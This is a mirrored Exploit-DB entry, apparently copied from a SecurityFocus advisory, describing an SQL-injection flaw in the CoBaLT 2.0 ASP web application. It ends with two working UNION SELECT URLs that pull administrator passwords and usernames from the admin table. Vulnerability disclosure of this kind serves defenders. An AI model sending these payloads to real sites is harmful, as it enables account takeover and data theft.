bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/asp/webapps/31666.txt
Offensive Security ed30890816 Updated 02_16_2014
2014-02-16 04:27:26 +00:00

11 lines
681 B
Text
Executable file
Raw Blame History

source: http://www.securityfocus.com/bid/28831/info
CoBaLT is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
CoBaLT 2.0 is affected; other versions may also be vulnerable.
http://www.example.com/cobalt/cobalt_v2_yonetim/adminler.asp?git=duzenle&id=2+union+select+0,(sifre),(uye),3,null,5,6,7,8+from+admin
http://www.example.com/cobalt/cobalt_v2_yonetim/adminler.asp?git=duzenle&id=2+union+select+0,(sifre),(uye),3,null,5,6,7,8+from+admin+where+id=4
Reference in a new issue View git blame Copy permalink